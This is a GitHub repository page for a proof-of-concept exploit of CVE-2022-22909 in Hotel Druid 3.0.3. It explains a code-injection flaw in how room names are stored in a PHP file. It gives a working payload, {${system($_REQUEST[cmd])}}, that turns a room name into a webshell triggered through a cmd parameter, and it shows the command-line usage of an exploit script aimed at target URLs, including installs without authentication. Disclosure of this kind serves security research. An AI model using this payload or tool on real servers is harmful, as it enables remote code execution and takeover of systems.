Skip to content

Hotel Druid 3.0.3 Code Injection to Remote Code Execution

License

Notifications You must be signed in to change notification settings

0z09e/CVE-2022-22909

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-22909

Description

A Code Injection vulnerability has been found on the Hotel Druid v3.0.3 application, which an attacker could exploit to execute remote code on the server. For a successful exploitation, an attacker should have the privilege to add a new room.

Vulnerability description

The vulnerability occurs because room names are getting stored inside a file named /dati/selectappartamenti.php using Double Quotes.

<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

Payload

To perform a successful exploitation, add a room with the following payload as room name.

{${system($_REQUEST[cmd])}}

After adding a new room, go to /dati/selectappartamenti.php and trigger the webshell by passing a command using the cmd parameter.

Usage

usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard

Example

If the application has no authentication. Use the --noauth flag to perform no authentication.

If the server has authentication enabled, use the --username and --password to perform authentication.

Credits

Researcher and POC writer - 0z09e


About

Hotel Druid 3.0.3 Code Injection to Remote Code Execution

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages